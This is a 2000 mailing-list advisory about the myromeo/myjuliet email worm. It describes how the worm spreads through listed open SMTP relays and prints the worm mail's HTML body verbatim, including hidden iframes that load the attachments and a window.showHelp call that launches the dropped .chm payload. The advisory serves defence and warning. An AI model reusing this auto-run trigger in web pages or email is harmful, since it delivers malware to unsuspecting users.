Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

new virus - myromeo

From: Piotr Klaban <makler () MAN TORUN PL>
Date: Thu, 16 Nov 2000 09:19:54 +0100
Hi,

Our nets were affected by the mail new virus - myromeo/myjuliet.
This would not be recognized by the e.g. AVP with current virus database.
Maybe you need to block it "by hand".

WHAT IT DOES TO THE COMPUTER:

Since I do not use Windows frequently, I do not know if this virus
does something bad to the computer. I have only information described below.

HOW IT WORKS:

The mail opens an html page, and magicaly runs the exe part. After that
it spreads across the net with mailing itself by connecting to the following
smtp sites (it seems they are open relays):
  212.244.199.2 - gate.panoramix.net.pl (down for now)
  195.117.152.91 - dns.inter-grafix.com.pl (do not answer. overloaded?)
  195.116.62.86 - madmax.quadrosoft.com
  194.153.216.60 - mail1.getin.pl (open relay)

madmax is not an open relay now, but it was yesterday (?):

<from the mail>
  Received: from kmgwza (xxx [ip-num])
        by madmax.quadrosoft.com (8.9.3/8.9.3) with SMTP id KAA11833;
        Wed, 15 Nov 2000 10:03:25 +0100
</from the mail>

getin.pl is an open relay and responses with the following line:
220-mail1.getin.pl Microsoft SMTP MAIL ready at Thu, 16 Nov 2000 ... \
  Version: 5.5.1877.357.35


VIRUS MAIL:

There are a few attachments in the virus mail:
  1 no description>                         [multipa/alternativ, 7bit, 0.7K]
  2 +-><no description>                 [text/plain, quoted, iso-8859-2, 0K]
  3 +-><no description>                [text/html, quoted, iso-8859-2, 0.4K]
  4 myromeo.exe                            [applica/x-msdownlo, base64, 38K]
  5 myjuliet.chm                          [applica/octet-stre, base64, 8.5K]

myromeo.exe is packed with UPX (very good pack utility).
The html part consists of a few lines:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
</HEAD>
<BODY BGCOLOR="black" TEXT="red">
<DIV>&nbsp;</DIV>

<IFRAME width=3D1 height=3D1 src=3D"cid:000701bf8458$eb570380$dc0732d4@666"></IFRAME>
<IFRAME width=3D1 height=3D1 src=3D"cid:000701bf8458$eb570381$dc0732d4@666"></IFRAME>
<P></P>

<SCRIPT>
 window.showHelp("c:/windows/temp/myjuliet.chm");
</SCRIPT>

</BODY></HTML>

Maybe Outlook Express need to be unpached to run that, do not know,
but users say, that the attachment run by itself.

Best regards,

--
Piotr Klaban
Previous By Date Next
Previous By Thread Next

Current thread: